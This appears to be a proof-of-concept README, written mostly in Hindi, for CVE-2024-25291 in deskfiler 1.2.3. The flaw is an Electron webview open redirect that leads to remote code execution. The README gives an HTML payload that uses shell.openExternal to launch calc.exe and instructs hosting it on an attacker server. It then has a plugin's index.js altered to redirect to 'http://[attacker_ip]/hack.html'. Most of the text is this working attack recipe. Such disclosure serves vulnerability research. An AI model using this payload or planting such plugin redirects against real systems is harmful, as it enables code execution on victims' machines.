
deskfiler 1.2.3 Open Redirect exploit
CVE-2024-25291 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट।
deskfiler - 1.2.3 एप्लिकेशन में इलेक्ट्रॉन वेबव्यू की अनुमति देता है, जिसके परिणामस्वरूप रिमोट कोड
इस रिपॉजिटरी में एक उदाहरण भेद्य एप्लिकेशन और इसका प्रूफ-ऑफ-कॉन्सेप्ट (POC) शोषण है।
<html>
<head>
<title>jruru</title>
</head>
<body>
<script>
const { shell } = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe');
</script>
</body>
</html>
※ यदि आप इसे जल्दी से परीक्षण करना चाहते हैं, तो निम्नलिखित कोड के साथ हमलावर के PC पर एक सर्वर बनाएं।
$ python -m http.server 80
नोट: ※ इस समय, यह माना जाता है कि प्लग-इन हमलावर द्वारा उत्पन्न एक प्लग-इन है, और यह केवल एक सामान्य प्लग-इन है जिसमें हमलावर सर्वर तक पहुँचने के लिए कोड जोड़ा गया है। सरल परीक्षण के लिए BareBone चुना गया है।

उसके बाद, BareBone फ़ोल्डर पथ में index.js फ़ाइल में निम्नलिखित कोड जोड़ें।
window.location='http://[attacker_ip]/hack.html'


इस PoC में, हमने एक प्लग-इन का उपयोग किया; हालांकि, हम मानते हैं कि वैकल्पिक हमले वैक्टर के साथ, स्वतंत्र रूप से रिमोट कोड निष्पादन (RCE) प्राप्त करना संभव है। इसके अतिरिक्त, यदि सर्वर-साइड भेद्यताएं जैसे Stored XSS, Reflected XSS मौजूद हैं, तो RCE भी संभव माना जाता है।